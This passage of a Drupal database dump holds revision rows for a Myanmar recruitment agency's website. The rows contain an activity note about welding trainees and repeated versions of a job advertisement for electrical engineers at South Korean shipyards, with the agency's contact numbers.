('activities', 0, 9, 187, 'ja', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p>', '', 'full_html'),
('activities', 0, 9, 187, 'ko', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('announcement', 0, 10, 16, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('announcement', 0, 10, 29, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">ကိုရီယားသင်္ဘောကျင်းတွင် Electrical Engineerဖြင့် အလုပ်သွားရောက်အလုပ်လုပ်ကိုင်ချင်သောကျွမ်းကျင်အင်ဂျင်နီယာများအမြန်အလိုရှိပါသည်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 35, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">ကိုရီယားသင်္ဘောကျင်းတွင် Electrical Engineerဖြင့် အလုပ်သွားရောက်အလုပ်လုပ်ကိုင်ချင်သောကျွမ်းကျင်အင်ဂျင်နီယာများအမြန်အလိုရှိပါသည်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 36, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">ကိုရီယားသင်္ဘောကျင်းတွင် Electrical Engineerဖြင့် အလုပ်သွားရောက်အလုပ်လုပ်ကိုင်ချင်သောကျွမ်းကျင်အင်ဂျင်နီယာများအမြန်အလိုရှိပါသည်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 43, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">ကိုရီယား သင်္ဘောကျင်းတွင် Electrical Engineerဖြင့် အလုပ်သွားရောက် အလုပ်လုပ်ကိုင်ချင်သေ ာကျွမ်းကျင် အင်ဂျင်နီယာများ အမြန်အလိုရှိပါသည်</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 72, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 127, 'en', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div 